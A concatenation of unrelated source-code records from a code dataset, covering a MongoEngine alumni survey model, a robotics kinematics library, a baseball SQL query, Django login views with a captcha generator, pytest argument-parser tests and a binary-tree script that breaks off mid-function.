Info(Document):\n\n\tname = StringField(max_length=120, required=True, verbose_name=\"Name\")\t\n\temail = StringField(max_length=120, required=True, verbose_name=\"Email Address\")\n\tyear = StringField(max_length=120, required=True, verbose_name=\"Year Graduated\")\n\tbackground = StringField(required=True, verbose_name=\"Background before ITP\")\n\tafterITP = StringField(required=True, verbose_name=\"After ITP\", help_text=\"What field/industry/work are you doing after ITP?\")\n\tage = StringField(max_length=50, required=True, verbose_name=\"Age (at start of ITP)\", help_text=\"What was your age when you started ITP?\")\n\tloans = 
StringField(choices= [('range1','$0 - $1,000'), ('range2','$1,000 - $15,000'), ('range3','$15,000 - $30,000'), ('range4','$30,000 - $45,000'), ('range5','$45,000 - $60,000'), ('range6','$60,000 - $75,000'), ('range7', '$75,000 - $90,000'), ('range8', '$90,000 - $105,000'), ('range9', 'greater than $105,000'), ('no answer', 'I would rather not say')], required=False, verbose_name=\"Total Loans Taken Out\", help_text=\"If you accepted loans for ITP, how much did they total?\")\n\tgender = StringField(choices = [('male','Male'),('female','Female')], verbose_name = \"Gender\", help_text=\"What is your gender?\")\n\tscholarship = StringField(required=True, choices = [(\"yes\", \"yes\"),(\"no\",\"no\")], verbose_name = \"Scholarship\", help_text=\"Did you receive any scholarship money from NYU?\")\n\n\t#slug just makes things look cleaner in the browser. \n\tslug = StringField()\n\t# Category is a list of Strings\n\tcategories = ListField(StringField(max_length=30))\n\n\n\t# Comments is a list of Document type 'Comments' defined above\n\tcomments = ListField( EmbeddedDocumentField(Comment) )\n\n\t# Timestamp will record the date and time idea was created.\n\t# (pass the callable, not its result, so each document gets its own creation time)\n\ttimestamp = DateTimeField(default=datetime.now)\n\nInfoForm = model_form(Info)\n\n\t\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293332029","text":"###\n# Based on Robotics Toolbox for Matlab created by Peter Corke\n#\n# Author: Rafael Torres\n#\n# 31 March 2020\n###\n\nimport numpy as np\nfrom math import sin, cos\nimport robopy.robot.transforms as tr\nimport robopy.robot.plot as robotplt\n\nclass Link:\n \"\"\"\n Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, sigma=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes the link object.\n \n Kinematic params:\n :param alpha: Link twist\n :param A: Link length\n :param theta: Joint angle\n :param D: Link offset\n :param sigma: [0, \"Revolute\" or 'R'] if revolute, [1, \"Prismatic\" or 'P'] if prismatic\n :param offset: Joint variable offset\n :param mdh: 0 if standard D&H, else 1\n :param qlim: Joint variable limits [min max]\n\n Dynamic params:\n :param m: Link mass\n :param r: Link COG with respect to link coordinate frame, in format 1x3 [x, y, z]\n :param I: Link inertia matrix, symmetric 3x3, about link COG\n \"\"\"\n\n # Defaults\n self.alpha = 0\n self.a = 0\n self.theta = 0\n self.d = 0\n self.sigma = None # Type will be retrieved from parameters parsed\n self.offset = 0\n self.mdh = 0\n self.qlim = []\n self.m = 0\n self.r = np.zeros(3)\n self.I = np.zeros( (3, 3) ) \n\n ### Type checking ###\n if sigma != None:\n if isinstance(sigma, str):\n sigma = sigma.lower()\n \n if sigma == \"revolute\" or sigma == 'r':\n self.sigma = 0\n elif sigma == \"prismatic\" or sigma == 'p':\n self.sigma = 1\n else:\n raise ValueError\n elif isinstance(sigma, int):\n if sigma not in [0, 1]:\n raise ValueError\n\n self.sigma = sigma\n else:\n raise AttributeError\n\n if(self.sigma == 0):\n assert ( theta==None ), \"'Theta' cannot be specified for a Revolute link!\"\n elif(self.sigma == 1):\n assert ( D==None ), \"'d' cannot be specified for a Prismatic link!\"\n\n assert( theta==None or D==None ), \"Cannot specify 'd' and 'theta'\"\n\n ### D&H parameters check\n if isinstance(alpha, (int, float)) and isinstance(A, (int, float)):\n self.alpha = alpha\n self.a = A\n else:\n raise 
AttributeError\n\n if theta != None:\n if isinstance(theta, (int, float)):\n self.theta = theta\n if sigma == None: # Constant value of theta means it must be prismatic\n sigma = 1\n else:\n raise AttributeError\n \n if D != None:\n if isinstance(D, (int, float)):\n self.d = D\n if sigma == None: # Constant value of D means it must be revolute\n sigma = 0\n else:\n raise AttributeError\n\n if isinstance(offset, (int, float)):\n self.offset = offset\n else:\n raise AttributeError\n\n if qlim:\n if isinstance(qlim, list) and isinstance(qlim[0], (int, float)) and len(qlim) == 2:\n self.qlim = qlim\n else:\n raise AttributeError\n\n ### Mass checks\n if isinstance(m, (int, float)):\n self.m = m\n else:\n raise AttributeError\n\n ### COG position check\n if r:\n if isinstance(r, list) and isinstance(r[0], (int, float)) and len(r) == 3:\n self.r = np.array(r)\n else:\n raise AttributeError\n\n ### Inertia check\n if I:\n if isinstance(I, list) and isinstance(I[0], list) and isinstance(I[0][0], (int, float)) and len(I) == 3 and len(I[0]) == 3:\n self.I = np.array(I)\n else:\n raise AttributeError\n\n ### D&H Convention checking ###\n if mdh == None:\n self.mdh = 0 # Standard: Classis D&H\n else:\n if isinstance(mdh, str):\n mdh = mdh.lower()\n \n if mdh == \"classic\" or mdh == 'c':\n self.mdh = 0\n elif mdh == \"modified\" or mdh == 'm':\n self.mdh = 1\n else:\n raise ValueError\n elif isinstance(mdh, int):\n if mdh not in [0, 1]:\n raise ValueError\n\n self.mdh = mdh\n else:\n raise AttributeError\n\n def isrevolute(self):\n return self.sigma == 0\n\n def isprismatic(self):\n return self.sigma == 1\n\n def Tm(self, q):\n \"\"\"\n Calculates a transformation matrix for the current link\n - For standard DH parameters, this is from the previous frame to the current\n - For modified DH parameters, this is from the current frame to the previous\n\n Note:\n - The link offset parameter is added to 'q' before computation of the matrix\n\n :param q: Value of the D&H non fixed parameter, 'theta' for revolute links and 'd' for prismatic links\n\n :returns 4x4 numpy.ndarray representing the Transformation Matrix \n \"\"\"\n\n sa = sin(self.alpha)\n ca = cos(self.alpha)\n a = self.a\n\n q = q + self.offset\n\n if self.isrevolute():\n st = sin(q)\n ct = cos(q)\n d = self.d\n else:\n st = sin(self.theta)\n ct = cos(self.theta)\n d = q\n\n if self.mdh == 0:\n\n return np.array([[ct, -st*ca, st*sa, a*ct],\n [st, ct*ca, -ct*sa, a*st],\n [ 0, sa, ca, d ],\n [ 0, 0, 0, 1 ]])\n\n else:\n\n return np.array([[ ct, -st, 0, a ],\n [st*ca, ct*ca, -sa, -sa*d],\n [st*sa, ct*sa, ca, ca*d],\n [ 0, 0, 0, 1 ]])\n\nclass Revolute(Link):\n \"\"\"\n Revolute Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes revolute link.\n Check Link class to understand params\n \"\"\"\n super().__init__(alpha=alpha, A=A, theta=theta, D=D, sigma=\"Revolute\", offset=offset, mdh=mdh, qlim=qlim,\n m=m, r=r, I=I)\n pass\n\nclass Prismatic(Link):\n \"\"\"\n Prismatic Link object class.\n \"\"\"\n\n def __init__(self, \n alpha=0, A=0, theta=None, D=None, offset=0, mdh=None, qlim=None, \n m=0, r=None, I=None):\n \"\"\"\n Initializes Prismatic link.\n Check Link class to understand params\n \"\"\"\n super().__init__(alpha=alpha, A=A, theta=theta, D=D, sigma=\"Prismatic\", offset=offset, mdh=mdh, qlim=qlim,\n m=m, r=r, I=I)\n pass\n\nclass SerialLink:\n \"\"\"\n SerialLink object class.\n \"\"\"\n\n def __init__(self, arg=None, 
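# [added, hypothetical usage sketch - not part of the original file]\n # arm = SerialLink([Revolute(A=1.0), Revolute(A=0.8)], name='planar2R')\n # tool_pose, joint_poses = arm.fkine([0.1, 0.2]) # 4x4 tool pose plus per-joint poses\n 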
gravity=None, base=None, tool=None, name=\"\"):\n \"\"\"\n Creates a SerialLink object.\n :param links: List of Link objects that will constitute the SerialLink object.\n :param gravity: Direction of gravity [gx, gy, gz]\n :param base: Pose of robot's base (4x4)\n :param tool: Robot's tool transform, with respect to last link coordinate frame\n \"\"\"\n\n # Defaults\n self.links = []\n\n self.gravity = np.array([0, 0, 9.81])\n self.base = np.identity(4)\n self.tool = np.identity(4)\n self.name = \"noname\"\n\n self.mdh = -1\n\n if isinstance(arg, list):\n if isinstance(arg[0], Link):\n self.links = arg\n else: \n raise AttributeError\n else:\n raise AttributeError # Other initialization methods not implemented yet\n\n # Check links for D&H convention\n for link in self.links:\n if( (link.mdh != self.mdh) and (self.mdh != -1) ):\n raise ValueError(\"Links have mixed D&H conventions!\")\n else:\n self.mdh = link.mdh\n\n if name:\n self.name = name\n\n # Gravity checks\n if gravity != None:\n assert ( isinstance(gravity, list) \n and len(gravity)==3 \n and isinstance(gravity[0], (int, float)) ), \"Gravity must be a 1x3 list of int or floats\"\n self.gravity = np.array(gravity)\n\n # Base transformation checks\n if base != None:\n assert ( isinstance(base, list) \n and len(base)==4 \n and isinstance(base[0], list)\n and len(base[0])==4\n and isinstance(base[0][0], (int, float))), \"Base must be a 4x4 list of int or floats\"\n self.base = np.array(base)\n\n # Tool transformation checks\n if tool != None:\n assert ( isinstance(tool, list) \n and len(tool)==4 \n and isinstance(tool[0], list)\n and len(tool[0])==4\n and isinstance(tool[0][0], (int, float))), \"Tool must be a 4x4 list of int or floats\"\n self.tool = np.array(tool)\n\n def append_link(self, link):\n if isinstance(link, Link):\n if( self.mdh != -1 ):\n assert (link.mdh == self.mdh), \"Links have mixed D&H conventions!\" \n else:\n self.mdh = link.mdh\n \n self.links.append(link)\n else:\n raise AttributeError\n\n def __add__(self, link):\n self.append_link(link)\n\n return self\n\n def __len__(self):\n return len(self.links)\n\n def display(self):\n \n ### SerialLink info ###\n print('\\n' + self.name + \": \" + str(len(self)) + \" axis\", end=\"\")\n if(self.mdh==0):\n print(\", standard D&H\\n\")\n elif(self.mdh==1):\n print(\", modified D&H\\n\")\n else:\n print('\\n')\n\n ### Links info ###\n space_to_j = 3\n space_to_params = 10\n\n params=[\"theta\", 'd', 'a', \"alpha\", \"offset\"]\n\n header_str = '+' + ('-'*space_to_j) + len(params)*('+' + ('-'*space_to_params)) + '+' # +---+----------+ (...)\n\n # Strings formatting:\n # ^x -> Center in a block of 'x' size\n # .y -> Limit to a block of 'x' size\n j_format = (\"{:^\" + str(space_to_j) + '.' + str(space_to_j) + '}') # \"{:^3.3}\" \n param_format = (\"{:^\" + str(space_to_params) + '.' + str(space_to_params) + '}') # \"{:^10.10}\"\n \n # Header display\n print(header_str)\n\n print('|' + j_format.format('j'), end=\"\")\n \n for param in params:\n print('|' + param_format.format(param), end=\"\")\n\n print('|') \n print(header_str)\n # End of header display\n\n for j, link in enumerate(self.links):\n \n # Index printing\n print('|' + j_format.format( str(j+1) ), end=\"\")\n\n # Parameters printing\n for param in params:\n print('|' + param_format.format( str( getattr(link, param) ) ), end=\"\")\n\n print('|')\n\n print(header_str + '\\n') # But isn't this the footer? 
¯\\_(u.u)_/¯\n\n ### Gravity, base and tool info ###\n grav_format = (\"{:>4.4}\")\n base_format = (\"{:>4.4}\")\n tool_format = (\"{:>4.4}\")\n\n grav_title = \"grav = \"\n base_title = \" base =\"\n tool_title = \" tool =\"\n for row in range( len(self.base) ):\n try:\n print(grav_title + grav_format.format( str(self.gravity[row]) ), end=\"\")\n except IndexError:\n # Gravity only has 3 rows while base and tool transforms have 4, so, print placeholder\n print(grav_title + ' '*len(grav_format.format( str(self.gravity[0]) )), end=\"\")\n\n print(base_title, end=\"\")\n for value in self.base[row]:\n print(' ' + base_format.format( str(value) ), end=\"\")\n\n print(tool_title, end=\"\")\n for value in self.tool[row]:\n print(' ' + tool_format.format( str(value) ), end=\"\")\n\n print()\n\n if row == 0:\n # After first row titles are no longer necessary, substitute for placeholder\n grav_title = ' '*len(grav_title)\n base_title = ' '*len(base_title)\n tool_title = ' '*len(tool_title)\n\n print()\n\n def rne(self, Q, QD=None, QDD=None, PL=None):\n \"\"\"\n Verifies input arguments and calculates torques using recursive Newton-Euler equations\n indirectly by calling the adequate methods\n\n :param Q: Array of joint positions\n :param QD: Array of joint velocities -> Qderivative = V\n :param QDD: Array of joint accelerations -> Vderivative\n :param PL: Array describing external forces (payload) on the end effector [Fx Fy Fz Nx Ny Nz]\n\n :return: Array of joint torques\n \"\"\"\n assert len(self), \"No links detected!\"\n\n if not isinstance(Q, list):\n raise AttributeError \n Q = np.array(Q)\n assert Q.shape == (len(self),), \"Wrong dimension!\"\n\n if QD != None:\n if not isinstance(QD, list):\n raise AttributeError\n QD = np.array(QD)\n assert QD.shape == (len(self),), \"Wrong dimension!\"\n else:\n QD = np.zeros(len(self))\n\n if QDD != None:\n if not isinstance(QDD, list):\n raise AttributeError\n QDD = np.array(QDD)\n assert QDD.shape == (len(self),), \"Wrong dimension!\"\n else:\n QDD = np.zeros(len(self))\n\n if PL != None:\n if not isinstance(PL, list):\n raise AttributeError\n PL = np.array(PL)\n assert PL.shape == (6,), \"Wrong dimension!\"\n else:\n PL = np.zeros(6)\n\n if self.mdh == 0:\n return self.__rne_dh(Q, QD, QDD, PL)\n elif self.mdh == 1:\n return self.__rne_mdh(Q, QD, QDD, PL)\n\n def __rne_dh(self, q, qd=None, qdd=None, pl=None):\n \"\"\"\n Calculates torques for joints using Recursive Newton-Euler equations\n Assumes classic D&H notation\n\n Invoque this method indirectly calling the 'rne' method\n \"\"\"\n print(\"Calculating torques...\")\n\n def __rne_mdh(self, q, qd=None, qdd=None, pl=None):\n \"\"\"\n Calculates torques for joints using Recursive Newton-Euler equations\n Assumes modified D&H notation\n\n Invoque this method indirectly calling the 'rne' method\n\n TODO: Include payload and external forces\n \"\"\"\n\n # Set debug to\n # 0 -> No messages\n # 1 -> Display results of outwards and inwards recursion\n debug = 0\n\n # Initial setup\n z = np.array([0, 0, 1]) # Initial 'Z' points \"up\", 'X' and 'Y' constitute top plane\n\n w = np.zeros(3) # Base has 0 joint angle,\n wd = np.zeros(3) # 0 joint speed and\n vd = self.gravity # fictitious upwards acceleration\n \n tau = np.zeros(len(self))\n F = np.zeros( (len(self), 3) )\n N = np.zeros( (len(self), 3) )\n\n if debug:\n print(\"\\nOutwards iterations\")\n\n # Outwards iteration\n for j, link in enumerate(self.links):\n Tm = link.Tm(q[j])\n\n if j == 0:\n # Include base transform\n Tm = self.base * Tm\n\n R = 
tr.t2r(Tm)\n R = np.linalg.inv(R) # Inverse\n \n P = (Tm)[0:-1, -1]\n\n Pc = link.r\n m = link.m\n I = link.I\n\n #\n # Trailing underscore means new value\n #\n if link.isrevolute():\n w_ = np.matmul(R, w) + qd[j]*z\n wd_ = np.matmul(R, wd) + np.cross(np.matmul(R, w), qd[j]*z) + qdd[j]*z\n vd_ = np.matmul(R, ( np.cross(wd, P) + np.cross(w, np.cross(w, P) ) + vd ) ) \n elif link.isprismatic():\n w_ = np.matmul(R, w)\n wd_ = np.matmul(R, wd)\n vd_ = ( np.matmul(R, ( np.cross(wd, P) + np.cross(w, np.cross(w, P) ) + vd ) ) + \n 2*np.cross(w_, qd[j]*z) + qdd[j]*z )\n\n vdc = np.cross(wd_, Pc) + np.cross(w_, np.cross(w_, Pc) ) + vd_\n \n F[j] = m*vdc\n N[j] = np.matmul(I, wd_) + np.cross(w_, np.matmul(I, w_) )\n\n # Update variables\n w = w_\n wd = wd_\n vd = vd_\n\n if debug:\n print(\"\\nLink \" + str(j+1) + ':')\n print(\"w = \" + str(w))\n print(\"wd = \" + str(wd))\n print(\"vd = \" + str(vd))\n print(\"vdc = \" + str(vdc))\n print(\"\\nF = \" + str(F[j]))\n print(\"N = \" + str(N[j]))\n\n f = pl[:3]\n n = pl[3:]\n\n # Initial transform matrix\n Tm = self.tool\n\n if debug:\n print(\"\\nInwards iterations\")\n\n # Inwards iteration\n for j, link in reversed( list( enumerate(self.links) ) ):\n \n R = tr.t2r(Tm)\n P = (Tm)[0:-1, -1]\n \n Pc = link.r \n\n #\n # Trailing underscore means new value\n #\n f_ = np.matmul(R, f) + F[j]\n n_ = N[j] + np.matmul(R, n) + np.cross(Pc, F[j]) + np.cross(P, np.matmul(R, f) )\n\n if link.isrevolute():\n tau[j] = np.matmul(n_, z)\n elif link.isprismatic():\n tau[j] = np.matmul(f_, z)\n\n # Update variables\n f = f_\n n = n_\n Tm = link.Tm(q[j])\n\n if debug:\n print(\"\\nLink \" + str(j+1) + ':')\n print(\"f = \" + str(f))\n print(\"n = \" + str(n))\n\n if debug:\n print()\n\n return tau\n\n def fkine(self, q):\n \"\"\"\n Forward Kinematics of manipulator\n \n :param q: The joint angles/configuration of the robot.\n \n :return: Pose of tool, shape (4, 4); \n :return: Array with shape (len(q), 4, 4), containing \n pose of joints.\n\n TODO: Options parameter to treat q array as degrees, not radians \n Assertions on 'q' size and number of links\n Trajectories\n \"\"\" \n\n pose_all = np.zeros((len(q), 4, 4))\n\n t = self.base\n\n for i in range(len(q)):\n t = np.matmul( t, self.links[i].Tm(q[i]) )\n\n pose_all[i] = t\n\n t = np.matmul( t, self.tool )\n\n return t, pose_all\n\n # Define the initial value for plotter\n plotter = None\n def plot(self, q, optimize=False):\n \"\"\"\n Graphical display of manipulator\n \n :param q: The joint angles/configuration of the robot.\n \"\"\"\n\n # Initialization\n if self.plotter is None:\n self.plotter = robotplt.Plotter(optimize)\n\n # Calculate forward kinematics\n t, pose_all = self.fkine(q)\n\n self.plotter.plot(self.base, pose_all, t)","sub_path":"robot/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":19686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"546949510","text":"umpires = [\n('hp_umpire_id', 'UHP'),\n('[1b_umpire_id]', 'U1B'),\n('[2b_umpire_id]', 'U2B'),\n('[3b_umpire_id]', 'U3B'),\n('lf_umpire_id', 'ULF'),\n('rf_umpire_id', 'URF'),\n]\n\n# Insert data for pitchers and managers\n\"\"\"\nINSERT OR IGNORE INTO person_appearance\n (\n person_id,\n team_id,\n game_id,\n appearance_type_id\n )\n\n\tSELECT\n\t\tv_manager_id,\n\t\tv_name,\n\t game_id,\n\t \"MM\"\n\tFROM game_log\n\tWHERE v_manager_id IS NOT NULL\n\nUNION\n\n SELECT\n h_manager_id,\n h_name,\n game_id,\n \"MM\"\n FROM game_log\n WHERE h_manager_id IS NOT NULL\n\nUNION\n\n 
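-- [added note] appearance codes below: AWP/ALP = winning/losing pitcher, ASP = saving\n -- pitcher, AWB = winning-RBI batter, PSP = starting pitcher; each CASE resolves the\n -- player's team name by comparing home and visitor scores.\n 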
SELECT\n winning_pitcher_id,\n CASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"AWP\"\n FROM game_log\n WHERE winning_pitcher_id IS NOT NULL\n\nUNION\n\t\n\tSELECT\n losing_pitcher_id,\n CASE\n WHEN h_score < v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"ALP\"\n FROM game_log\n WHERE losing_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\tsaving_pitcher_id,\n\t\tCASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"ASP\"\n FROM game_log\n WHERE saving_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\twinning_rbi_batter_id, \n\t\tCASE\n WHEN h_score > v_score THEN h_name\n ELSE v_name\n END,\n game_id,\n \"AWB\"\n FROM game_log\n WHERE winning_rbi_batter_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\tv_starting_pitcher_id,\n\t\tv_name,\n\t\tgame_id,\n\t\t\"PSP\"\n\tFROM game_log\n\tWHERE v_starting_pitcher_id IS NOT NULL\n\nUNION\n\n\tSELECT\n\t\th_starting_pitcher_id,\n\t\th_name,\n\t\tgame_id,\n\t\t\"PSP\"\n\tFROM game_log\n\tWHERE h_starting_pitcher_id IS NOT NULL\t\n\"\"\"\n","sub_path":"MBL/MLB_project.py","file_name":"MLB_project.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"618747241","text":"# coding: utf-8\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom . import models\nimport re\nimport random\nimport io\nimport json, pickle\nimport rsa\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n# Create your views here.\n\n\ndef login_page(request):\n return render(request, 'login/login_page.html')\n\n\ndef register_page(request):\n return render(request, 'login/register_page.html')\n\n\ndef login_handle(request):\n user_name = request.POST.get('userName')\n passwd = request.POST.get('passwd')\n verify_code = request.POST.get('verifycode').upper()\n if verify_code == request.session['verifycode']:\n user = auth.authenticate(request, username=user_name, password=passwd)\n if user is not None:\n auth.login(request, user)\n return HttpResponse('valid')\n else:\n return HttpResponse(None)\n else:\n return HttpResponse('VerifyError')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/login/login_page')\n\n\ndef check_username(request):\n if request.is_ajax():\n user_name = request.POST.get('userName')\n exist = User.objects.filter(username=user_name)\n if exist:\n return HttpResponse(True)\n else:\n return HttpResponse(False)\n\n\ndef register_handle(request):\n user_name = request.POST.get('userName')\n passwd = request.POST.get('passwd')\n verifycode = request.POST.get('verifycode').upper()\n if verifycode == request.session['verifycode']:\n if not User.objects.filter(username=user_name):\n if re.match('^[\\\x21-\\\x7d]{6,16}$', passwd, re.S):\n new_user = User.objects.create_user(username=user_name, password=passwd)\n new_user.save()\n return HttpResponse('succeed')\n else:\n return HttpResponse('Invalid password format')\n else:\n return HttpResponse('Username already exists')\n return HttpResponse('Incorrect verification code')\n\n\ndef user_center(request):\n if request.user.is_authenticated:\n user = User.objects.get(username=request.user)\n try:\n info = user.userinfo\n except Exception:\n info = None\n return render(request, 'login/user_center.html', {'userInfo': info})\n return HttpResponse(None)\n\n\ndef info_handle(request):\n if request.user.is_authenticated:\n user = User.objects.get(username=request.user)\n name = request.POST.get('name')\n telephone = 
request.POST.get('telephone')\n address = request.POST.get('address')\n try:\n user_info = user.userinfo\n\n except Exception:\n\n user_info = models.UserInfo(user=user)\n\n user_info.full_name = name\n user_info.telephone = telephone\n user_info.address = address\n user_info.save()\n return HttpResponse('ok')\n\n\ndef my_order(request):\n orders = models.UserOrder.objects.filter(user=request.user)\n data = []\n for order in orders:\n shop_list = json.loads(order.shop)\n info = []\n for shop in shop_list:\n shop_id = shop['shop_id']\n count = shop['count']\n shop_object = models.ShopInfo.objects.get(id=shop_id)\n info.append([shop_object, count])\n data.append({'order': order, 'info': info})\n return render(request, 'login/my_order.html', {'data': data})\n\n\ndef verifycode(request):\n # Define variables for the canvas background color, width and height\n bgcolor = (random.randrange(20, 100), random.randrange(\n 20, 100), 255)\n width = 100\n height = 25\n # Create the image object\n im = Image.new('RGB', (width, height), bgcolor)\n # Create the pen (drawing) object\n draw = ImageDraw.Draw(im)\n # Use the pen's point() function to draw noise dots\n for i in range(0, 100):\n xy = (random.randrange(0, width), random.randrange(0, height))\n fill = (random.randrange(0, 255), 255, random.randrange(0, 255))\n draw.point(xy, fill=fill)\n # Define the candidate characters for the verification code\n str1 = 'ABCD123EFGHIJK456LMNOPQRS789TUVWXYZ0'\n # Randomly pick 4 characters as the verification code\n rand_str = ''\n for i in range(0, 4):\n rand_str += str1[random.randrange(0, len(str1))]\n # Build the font object\n font = ImageFont.truetype('FreeMono.ttf', 23)\n # Build the font color\n fontcolor = (255, random.randrange(0, 255), random.randrange(0, 255))\n # Draw the 4 characters\n draw.text((5, 2), rand_str[0], font=font, fill=fontcolor)\n draw.text((25, 2), rand_str[1], font=font, fill=fontcolor)\n draw.text((50, 2), rand_str[2], font=font, fill=fontcolor)\n draw.text((75, 2), rand_str[3], font=font, fill=fontcolor)\n # Release the pen\n del draw\n # Store in the session for later verification\n request.session['verifycode'] = rand_str\n # In-memory file operation\n buf = io.BytesIO()\n # Save the image to memory as PNG\n im.save(buf, 'png')\n # Return the in-memory image data to the client with the image/png MIME type\n return HttpResponse(buf.getvalue(), 'image/png')","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"614425451","text":"import itertools\nimport json\nfrom dataclasses import asdict\n\nimport errors\nimport pytest\nfrom processor.core.argparser import create_common_project_parser, create_common_vcs_parser, read_config, write_config\nfrom processor.core.docker import Worktree\n\nCONFIG_NAME = \".defects4cpp.json\"\n\n\ndef test_read_config_not_exist(tmp_path):\n with pytest.raises(errors.DppArgparseFileNotFoundError):\n read_config(str(tmp_path / \"foo.json\"))\n\n\ndef test_read_config_invalid_json(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n fp.write(\"hello, world!\")\n\n with pytest.raises(errors.DppArgparseInvalidConfigError):\n read_config(tmp_path)\n\n\ndef test_read_config_corrupted_json(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n obj = {\"foo\": 1}\n json.dump(obj, fp)\n\n with pytest.raises(errors.DppArgparseConfigCorruptedError):\n read_config(tmp_path)\n\n\ndef test_read_config(tmp_path):\n dummy = tmp_path / CONFIG_NAME\n with open(dummy, \"w+\") as fp:\n obj = {\n \"project_name\": \"yara\",\n \"index\": 1,\n \"buggy\": False,\n \"workspace\": str(tmp_path),\n }\n json.dump(obj, fp)\n\n metadata, worktree = read_config(tmp_path)\n\n assert metadata.name == 
obj[\"project_name\"]\n assert worktree.index == obj[\"index\"]\n assert worktree.buggy == obj[\"buggy\"]\n assert worktree.workspace == obj[\"workspace\"]\n\n\ndef test_write_config(tmp_path):\n worktree = Worktree(\"yara\", 1, True, str(tmp_path / \"imaginary_path\"))\n\n with pytest.raises(errors.DppArgparseFileNotFoundError):\n write_config(worktree)\n\n p = tmp_path / \"yara\" / \"buggy#1\"\n p.mkdir(parents=True)\n\n worktree = Worktree(\"yara\", 1, True, str(tmp_path))\n write_config(worktree)\n\n with open(p / CONFIG_NAME, \"r\") as fp:\n config = json.load(fp)\n\n assert asdict(worktree) == config\n\n\ndef test_project_parser_invalid_project_should_throw(tmp_path):\n parser = create_common_project_parser()\n\n with pytest.raises(errors.DppArgparseNotProjectDirectory):\n parser.parse_args(f\"{tmp_path} --coverage\".split())\n\n\ndef test_project_parser_should_read_config_json(tmp_path):\n parser = create_common_project_parser()\n project_name = \"yara\"\n\n with open(tmp_path / CONFIG_NAME, \"w+\") as fp:\n obj = {\n \"project_name\": project_name,\n \"index\": 1,\n \"buggy\": False,\n \"workspace\": str(tmp_path),\n }\n json.dump(obj, fp)\n\n args = parser.parse_args(f\"{tmp_path} --coverage\".split())\n\n assert hasattr(args, \"metadata\")\n assert args.metadata.name == project_name\n assert hasattr(args, \"worktree\")\n assert not args.worktree.buggy\n assert args.worktree.index == 1\n assert args.path == str(tmp_path)\n\n\ndef test_vcs_parser_invalid_project_should_throw():\n parser = create_common_vcs_parser()\n\n with pytest.raises(SystemExit):\n parser.parse_args(\"foobar 1 --buggy\".split())\n\n\n@pytest.mark.parametrize(\"cmd_line\", [\"yara 1 --buggy\", \"yara --buggy 1\"])\ndef test_vcs_parser_unordered_arguments_should_be_handled(cmd_line):\n parser = create_common_vcs_parser()\n\n args = parser.parse_args(cmd_line.split())\n metadata = args.metadata\n worktree = args.worktree\n\n assert metadata.name == \"yara\"\n assert worktree.index == 1\n assert worktree.buggy\n\n\ndef test_vcs_parser_unordered_arguments_should_be_handled_with_target_option():\n parser = create_common_vcs_parser()\n arguments = [\"1\", \"--buggy\", \"--target=/home/test\"]\n\n for argument in itertools.permutations(arguments):\n args = parser.parse_args([\"yara\", *argument])\n metadata = args.metadata\n worktree = args.worktree\n\n assert metadata.name == \"yara\"\n assert worktree.index == 1\n assert worktree.buggy\n assert worktree.workspace == \"/home/test\"\n","sub_path":"tests/processor/test_argparse.py","file_name":"test_argparse.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347457571","text":"#binary tree\n\nclass Node:\n def __init__(self, data) -> None:\n self.right = None\n self.left = None\n self.data = data\n\n def CreateTree(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.CreateTree(data)\n else:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.CreateTree(data)\n else:\n self.data = data\n \n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print( self.data)\n if self.right:\n self.right.PrintTree()\n # binary tree traversal\n\n # inorder traversal\n def inordertraversal( self, root):\n res = []\n if root:\n res = res + self.inordertraversal(root.left)\n res.append(root.data)\n res = res + self.inordertraversal(root.right) \n return res\n # pre order traversal\n def 
preordertraversal(self, root):\n res = []\n if root:\n res.append(root.data)\n res = res + self.preordertraversal(root.left)\n res = res + self.preordertraversal(root.right)\n return res\n def postordertraversal(self, root):\n res = []\n if root:\n # postorder visits left subtree, then right subtree, then the node itself\n res = res + self.postordertraversal(root.left)\n res = res + self.postordertraversal(root.right)\n res.append(root.data)\n return res\n\n # print only left view binary tree\n\ndef leftView(root, level, dict):\n # base case\n if root is None:\n return\n # insert the current node and level information into the map\n dict[level] = root.data\n \n # recur for the right subtree before the left subtree\n leftView(root.right, level + 1, dict)\n leftView(root.left, level + 1, dict)\n return dict\n\ndef printTree(node, level=0):\n if node != None:\n printTree(node.left, level + 1)\n print(' ' * 4 * level + '->', node.data)\n printTree(node.right, level + 1)\n\n\n\n\ndef main():\n #creating tree\n root = Node(10)\n root.CreateTree(5)\n root.CreateTree(15)\n # root.CreateTree(1)\n # root.CreateTree(10)\n # root.CreateTree(9)\n # 